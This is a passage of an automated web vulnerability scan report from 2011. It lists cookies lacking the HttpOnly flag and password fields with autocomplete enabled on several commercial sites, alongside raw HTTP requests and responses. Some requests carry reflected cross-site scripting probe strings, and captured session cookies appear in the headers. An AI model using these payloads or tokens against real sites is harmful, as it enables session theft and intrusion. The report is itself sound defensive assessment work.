P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=c437c7a28b71ec890cf440a1d883; Path=/PCICS
Connection: close
Content-Length: 590


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html
...[SNIP]...

6.6. https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestion

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doMetaQuestion

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /PCICS/MerController/doMetaQuestion HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestions
Content-Length: 203
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

partner=Comodo&theAnswer+to+Do+you+have+a+POS+terminal%2C+or+other+Payment+Application%2C+andourForwardSlashMarkeror+an+Imprint+Machine+%28ourDoubleQuoteMarkerknuckle-busterourDoubleQuoteMarker%29%3F=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:49 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=c4b411f07d6c067b98ce9194a5ae; Path=/PCICS
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...

6.7. https://www.panopticsecurity.com/PCICS/PanController/doInitUser

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doInitUser

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PCICS/PanController/doInitUser?partner=Comodo&path=Enter+ExpertPCI HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c483ef1a943db8e1f27035ee8e5c

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 18 Sep 2011 11:28:59 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: Servlet/3.0 JSP/2.2 (GlassFish Server Open Source Edition 3.1 Java/Sun Microsystems Inc./1.6)
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Location: http://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 224
Set-Cookie: JSESSIONID=c48a63af3a1fe42b1ac75b96be64; Path=/PCICS
Connection: close

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo">here</a>
...[SNIP]...

6.8. http://www.trustfax.com/a

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trustfax.com
Path:   /a

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a HTTP/1.1
Host: www.trustfax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.trustfax.com/pricing.htmlaf10d--%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E0bedec460c4

Response

HTTP/1.1 404 Not Found
Date: Sun, 18 Sep 2011 11:52:19 GMT
Server: Apache
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=798DFD1D548B6B5C106F73F5DF24E3F0.trustfax2a; Path=/trustfax-cms-public
Set-Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; Version=1; Domain=www.trustfax.com; Max-Age=31536000; Expires=Mon, 17-Sep-2012 11:52:19 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 11:52:19 GMT
X-TWA-Web: pb:28192
Content-Length: 0
Content-Type: text/html;charset=UTF-8


6.9. http://apis.google.com/js/plusone.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
Proxy-Connection: keep-alive
Referer: http://www.fusemail.com/products/spam-and-virus-filtering/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=mCI0VZozMcVtfOnsXPWKRIg4CFYHD91WLLi_uPVaxjIGdNNCCPTpbb-Y6ItlcrUaFRZ1_uYF76XD4xG_aXDqKnNnWckAgZKDE_tqIYZX_5tTbL1lkWSJHXddkQriOGGX; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjraOk0NnKnon18FmQ0anHqw5G5b8D7UKVV-fvoBa-B7nHUAI1yJPXkeoZPmNzpO5TVyyzlW1fNxwBHtH2HmDETt4jQdxjCyPqZ0_Mz1dsplqhrmR2JS56T55_h5iz2URKMamLZkIdrgZB_dQvqVSloGJgky-ppUKdS0uO8737_ewtjmsYtlOysbxj00Pjud9F-PuoMEpszT-bzZhHJBEZepn0S0pmDxxr7KidOd1oXi21FARDUcsfI_WLw-qAvsGbFgIXIj_A7xnaM4KZLe8U31tgLzYqwxvP5awMCzfx50c

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAD7Xl0oDS_3Xy0JKwYeKgRj5Y_McDPpUTRM70c1_kfRaM0t1NIGOeKymCZf_GkU6cxXYEHblQwAvGR_WSjcMuxkvK3WyncNjjtSf5BO7OMdVM8V2NjhVDXfhMJ6l8gPKEvJNy95-i_R-RDOyY0ADU6-pKSHuPOnJlY5NCKau5HhqlG4rtz9dlPp2-RUQ0e00xAg-03wDCA5Aya4w2pvz_sx9PKUz4Z_p_7XpMhOQPpQoHjbly5_fRWrgbicqscZk4n9CAAkmJfJLiLOih9pzf-hVx55GXF4ceDiaulA2MQUbxeqBsxvSi3H3-auSOBF0i8;Domain=.google.com;Path=/;Expires=Wed, 15-Sep-2021 12:19:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Sun, 18 Sep 2011 12:19:27 GMT
Date: Sun, 18 Sep 2011 12:19:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5519

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23803279-4555db52';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

6.10. http://log.optimizely.com/event

Summary

Severity:   Information
Confidence:   Certain
Host:   http://log.optimizely.com
Path:   /event

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event?a=8018129&e=1&n=http%3A%2F%2Fwww.comodo.com%2F&u=oeu1315419552319r0.6822604623157531&y=false&x8022314=8017411&t=1316328651420 HTTP/1.1
Host: log.optimizely.com
Proxy-Connection: keep-alive
Referer: http://www.comodo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: external_5879383_end_user_id=oeu1314998032371r0.5426059009041637; external_8018129_end_user_id=oeu1315419552319r0.6822604623157531; external_5830034_end_user_id=oeu1316239542576r0.9213690920732915

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Sun, 18 Sep 2011 01:49:45 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Server: nginx/0.8.54
Set-Cookie: external_8018129_bucket_map=8022314%3A8017411; expires=Wed, 15-Sep-2021 01:49:45 GMT
Content-Length: 35
Connection: keep-alive

GIF89a.............,...........D..;

6.11. http://server.iad.liveperson.net/hc/61298727/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/61298727/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/61298727/?visitor=&msessionkey=&site=61298727&cmd=startPage&page=http%3A//www.instantssl.com/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=125749232&scriptVersion=1.1&d=1316328667529&&SESSIONVAR!skill=Sales&scriptType=SERVERBASED&title=SSL%20Certificate%20From%20Comodo%u2122%20with%20Free%20SSL%20Certificates%20and%20Server%20Certificates%20%u2013%20Digital%20Certificate%20Authority&referrer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dcomodo HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.instantssl.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5094376206423575644; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1316310598891

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 01:50:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_61298727=STANDALONE; path=/hc/61298727
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89aP............,...........L.;

6.12. http://server.iad.liveperson.net/hc/61298727/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/61298727/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/61298727/?visitor=&msessionkey=&site=61298727&cmd=knockPage&page=http%3A//www.instantssl.com/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=125749232&scriptVersion=1.1&d=1316328664526&title=SSL%20Certificate%20From%20Comodo%u2122%20with%20Free%20SSL%20Certificates%20and%20Server%20Certificates%20%u2013%20Digital%20Certificate%20Authority&referrer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dcomodo HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.instantssl.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=717244329590173063; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1316310590892

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 01:50:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=6096801432485254544; path=/hc/61298727
Set-Cookie: HumanClickACTIVE=1316310600121; expires=Mon, 19-Sep-2011 01:50:00 GMT; path=/
Content-Type: image/gif
Last-Modified: Sun, 18 Sep 2011 01:50:00 GMT
Cache-Control: private
Content-Length: 34

GIF89aZ............,...........L.;

6.13. http://server.iad.liveperson.net/hc/61298727/x.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/61298727/x.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/61298727/x.js?cmd=file&file=chatScript3&site=61298727&&imageUrl=http://www.instantssl.com/ssl-certificate-images/liveperson/sales HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.instantssl.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1316296223985

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 01:49:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1316310592783; expires=Mon, 19-Sep-2011 01:49:52 GMT; path=/
Set-Cookie: HumanClickKEY=2402553747963169661; path=/hc/61298727
Cache-Control: max-age=900
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 18 Sep 2011 01:49:52 GMT
Content-Length: 33363

var SCRIPT_VERSION = "1.1";

if (typeof(lpNumber) == "undefined")
lpNumber = '61298727';

var lpUseFirstParty = ("true" == "false");
var lpUseSecureCookies = ("true" == "false");
var lpUseSessionC
...[SNIP]...

6.14. http://www.bizographics.com/collect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collect/?pid=749&url=http%3A%2F%2Fwww.govinfosecurity.com%2Farticles.php%3Fart_id%3D4067%26ceb4a%2527%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253Eae00085e7e2%3D1&pageUrl=http%3A%2F%2Fwww.govinfosecurity.com%2Farticles.php%3Fart_id%3D4067%26ceb4a%2527%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253Eae00085e7e2%3D1&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&time=1316366252200 HTTP/1.1
Host: www.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.govinfosecurity.com/articles.php?art_id=4067&ceb4a%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eae00085e7e2=1
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sun, 18 Sep 2011 12:16:27 GMT
Server: nginx/0.7.61
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Fri, 16-Sep-2016 12:16:27 GMT; Path=/
Content-Length: 9
Connection: keep-alive

//opt out

6.15. http://www.seeos.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seeos.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.seeos.com
Proxy-Connection: keep-alive
Referer: http://www.trustix.com/small/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:42 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Set-Cookie: uid=www4e75df0eb30884.96319108; expires=Mon, 19-Sep-2011 12:07:42 GMT
Vary: Accept-Encoding
Content-Length: 831
Connection: close
Content-Type: text/html

<html>
<head>
<title>seeos.com: The Leading See OS Site on the Net</title>
</head>
<frameset cols="1,*,1" border=0>
<frame name="top" src="tg.php?uid=www4e75df0eb30884.96319108&src=&cat=travel&kw=Se
...[SNIP]...

7. Password field with autocomplete enabled
There are 70 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. http://efaxcorporate.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://efaxcorporate.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="tabContent_admin" class="loginTabContent" style="display: none;"> <form novalidate="novalidate" action="https://www.efaxcorporate.com/corp/twa/login" name="admin" id="admin" method="POST" style="width: 100%;"> <input type="hidden" name="formName" value="admin" />
...[SNIP]...
<div style="margin-bottom: 5px; clear: both;"><input type="password" id="adminpassword" maxlength="25" size="15" setcookie="false" name="password" value="" onkeyup="isValid(this, 'option')" onblur="isValid(this, 'option');" required="true" validationtype="password" style="float: left;" class="textInput" /> <div style="clear: both;">
...[SNIP]...

7.2. http://efaxcorporate.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://efaxcorporate.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="tabContent_user" class="loginTabContent" style=""> <form novalidate="novalidate" action="https://www.efaxcorporate.com/corp/twa/login" name="user" id="user" method="POST" style="width: 100%;"> <input type="hidden" name="formName" value="user" />
...[SNIP]...
<div style="margin-bottom: 5px; clear: both;"><input type="password" id="userpassword" maxlength="20" size="15" setcookie="false" name="password" value="" onkeyup="isValid(this, '');" onblur="isValid(this, '');" required="true" validationtype="password" style="float: left;" class="textInput" /> <div style="clear: both;">
...[SNIP]...

7.3. http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility

Summary

Severity:   Low
Confidence:   Certain
Host:   http://efaxcorporate.com
Path:   /solutions/Compatibility/Industry-Compatibility

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /solutions/Compatibility/Industry-Compatibility HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://efaxcorporate.com/?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; brand=efaxcorp; __g_c=w%3A1%7Cb%3A2; mbox=check#true#1316366487|session#1316366426074-552683#1316368287; s_cc=true; s_ev4=%5B%5B%27home.j2.com%27%2C%271316366426332%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316366426333%27%5D%5D; j2CampaignTracking=; __utma=110028753.680056721.1316366426.1316366426.1316366426.1; __utmb=110028753.1.10.1316366426; __utmc=110028753; __utmz=110028753.1316366426.1.1.utmcsr=j2|utmccn=enterprise%20page|utmcmd=cross%20sell; c_m=undefinedhome.j2.comhome.j2.com; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:43 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=96D358893B7F3897A12EA3F682AD7C0A.efaxcorp1a; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:43 GMT
Content-Length: 39406
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http
...[SNIP]...
<div id="tabContent_user" class="loginTabContent" style=""> <form novalidate="novalidate" action="https://www.efaxcorporate.com/corp/twa/login" name="user" id="user" method="POST" style="width: 100%;"> <input type="hidden" name="formName" value="user" />
...[SNIP]...
<div style="margin-bottom: 5px; clear: both;"><input type="password" id="userpassword" maxlength="20" size="15" setcookie="false" name="password" value="" onkeyup="isValid(this, '');" onblur="isValid(this, '');" required="true" validationtype="password" style="float: left;" class="textInput" /> <div style="clear: both;">
...[SNIP]...

7.4. http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility

Summary

Severity:   Low
Confidence:   Certain
Host:   http://efaxcorporate.com
Path:   /solutions/Compatibility/Industry-Compatibility

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /solutions/Compatibility/Industry-Compatibility HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://efaxcorporate.com/?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
